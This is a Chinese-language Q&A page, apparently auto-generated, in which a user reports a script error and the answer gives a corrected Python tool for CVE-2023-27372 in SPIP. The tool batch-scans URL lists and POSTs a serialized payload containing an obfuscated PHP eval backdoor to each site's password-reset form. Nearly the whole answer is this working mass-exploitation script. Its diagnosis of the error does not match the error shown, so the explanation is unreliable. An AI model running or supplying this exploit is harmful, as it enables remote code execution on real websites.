脚本报错: line 38 +;$b = $$aa;evalsubstrnbase64_decode$b1;;&nobotimport argparseimport requestsfrom bs4 import BeautifulSoupimport urllibparsefrom concurrentfutures import ThreadPoolExecutorimport mult
在第38行,代码中使用了一个变量args.url,但是在该行之前没有定义args变量。这可能是因为在导入argparse模块之前使用了args.url。要解决这个问题,可以将导入argparse模块的位置移动到脚本的开头。修改后的代码如下:
import argparse
import requests
from bs4 import BeautifulSoup
import urllib.parse
from concurrent.futures import ThreadPoolExecutor
import multiprocessing
def main():
# 解析命令行参数
parser = argparse.ArgumentParser(description="Send POST request and check for vulnerability")
parser.add_argument("-u", "--url", type=str, help="URL of the target")
parser.add_argument("-t", "--txt", type=str, help="Path to the text file containing URLs")
args = parser.parse_args()
# 检查是否提供了URL或txt文件
if not args.url and not args.txt:
print("Please provide a URL using the -u or --url option, or a text file using the -t or --txt option.")
exit()
# 处理单个URL的情况
if args.url:
result = check_vulnerability(args.url)
print(result)
# 处理文本文件中包含多个URL的情况
if args.txt:
with open(args.txt, 'r') as file:
urls = file.readlines()
urls = [url.strip() for url in urls if url.strip()]
num_urls = len(urls)
current_url = 0
# 根据 URL 数量来动态决定线程池的大小
num_threads = min(num_urls, multiprocessing.cpu_count() * 2)
results = []
with ThreadPoolExecutor(max_workers=num_threads) as executor:
for url in urls:
current_url += 1
print(f"正在处理 URL: {url.strip()} [{current_url}/{num_urls}]")
result = executor.submit(check_vulnerability, url.strip())
results.append(result)
output_file = "CVE-2023-27372-result.txt"
with open(output_file, "w") as file:
for url, result in zip(urls, results):
file.write(f"{url.strip()}:\n")
file.write(f" {result.result()}\n")
print(f"结果已保存至 {output_file}")
# 函数用于检查漏洞
def check_vulnerability(url):
parsed_url = urllib.parse.urlparse(url)
# 确定请求的URL
if not parsed_url.path.endswith('/'):
url += '/'
request_url = urllib.parse.urljoin(url, 'spip.php?page=spip_pass')
response = requests.get(request_url)
soup = BeautifulSoup(response.text, "html.parser")
formulaire_action_args_input = soup.find("input", {"name": "formulaire_action_args"})
formulaire_action_args_value = formulaire_action_args_input.get("value")
formulaire_action_args_value_encoded = urllib.parse.quote(formulaire_action_args_value, safe='')
headers = {
"Host": parsed_url.netloc,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
}
data = f'page=spip_pass&formulaire_action=oubli&formulaire_action_args={formulaire_action_args_value_encoded}&oubli=s:19:"<?php $a = "~+d()"^"!{+{}";$b = ${$a}[a];@eval(substr("n".base64_decode($b),1));?>";&nobot='
response = requests.post(request_url, headers=headers, data=data)
if response.status_code == 200 and 'oubli' in response.text and 'phpinfo()' in response.text:
return f"存在CVE-2023-27372漏洞"
else:
return f"不存在CVE-2023-27372漏洞"
if __name__ == "__main__":
main()
``
原文地址: https://www.cveoy.top/t/topic/h2y1 著作权归作者所有。请勿转载和采集!